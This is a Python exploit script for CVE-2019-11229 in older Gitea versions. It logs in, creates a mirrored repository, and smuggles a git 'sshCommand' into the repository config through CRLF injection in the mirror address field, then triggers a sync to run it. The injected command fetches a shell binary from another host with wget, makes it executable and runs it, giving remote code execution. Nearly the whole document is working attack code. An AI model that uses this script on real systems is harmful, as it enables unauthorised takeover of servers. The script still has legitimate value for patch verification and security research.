# Exploit Title: Gitea 1.7.5 - Remote Code Execution # Date: 2020-05-11 # Exploit Author: 1F98D # Original Author: LoRexxar # Software Link: https://gitea.io/en-us/ # Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3 # Tested on: Debian 9.11 (x64) # CVE: CVE-2019-11229 # References: # https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa # # Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings, # leading to authenticated remote code execution. # #!/usr/bin/python3 import re import os import sys import random import string import requests import tempfile import threading import http.server import socketserver import urllib.parse from functools import partial USERNAME = "test" PASSWORD = "password123" HOST_ADDR = '192.168.1.1' HOST_PORT = 3000 URL = 'http://192.168.1.2:3000' CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' # Login s = requests.Session() print('Logging in') body = { 'user_name': USERNAME, 'password': PASSWORD } r = s.post(URL + '/user/login',data=body) if r.status_code != 200: print('Login unsuccessful') sys.exit(1) print('Logged in successfully') # Obtain user ID for future requests print('Retrieving user ID') r = s.get(URL + '/') if r.status_code != 200: print('Could not retrieve user ID') sys.exit(1) m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text) USER_ID = m.group(1) print('Retrieved user ID: {}'.format(USER_ID)) # Hosting the repository to clone gitTemp = tempfile.mkdtemp() os.system('cd {} && git init'.format(gitTemp)) os.system('cd {} && git config user.email x@x.com && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp)) os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp)) os.system('cd {}.git && git update-server-info'.format(gitTemp)) handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp') socketserver.TCPServer.allow_reuse_address = True httpd = socketserver.TCPServer(("", HOST_PORT), handler) t = threading.Thread(target=httpd.serve_forever) t.start() print('Created temporary git server to host {}.git'.format(gitTemp)) # Create the repository print('Creating repository') REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) body = { '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), 'uid': USER_ID, 'repo_name': REPO_NAME, 'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]), 'mirror': 'on' } r = s.post(URL + '/repo/migrate', data=body) if r.status_code != 200: print('Error creating repo') httpd.shutdown() t.join() sys.exit(1) print('Repo "{}" created'.format(REPO_NAME)) # Inject command into config file print('Injecting command into repo') body = { '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), 'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD), 'action': 'mirror', 'enable_prune': 'on', 'interval': '8h0m0s' } r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body) if r.status_code != 200: print('Error injecting command') httpd.shutdown() t.join() sys.exit(1) print('Command injected') # Trigger the command print('Triggering command') body = { '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), 'action': 'mirror-sync' } r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body) if r.status_code != 200: print('Error triggering command') httpd.shutdown() t.join() sys.exit(1) print('Command triggered') # Shutdown the git server httpd.shutdown()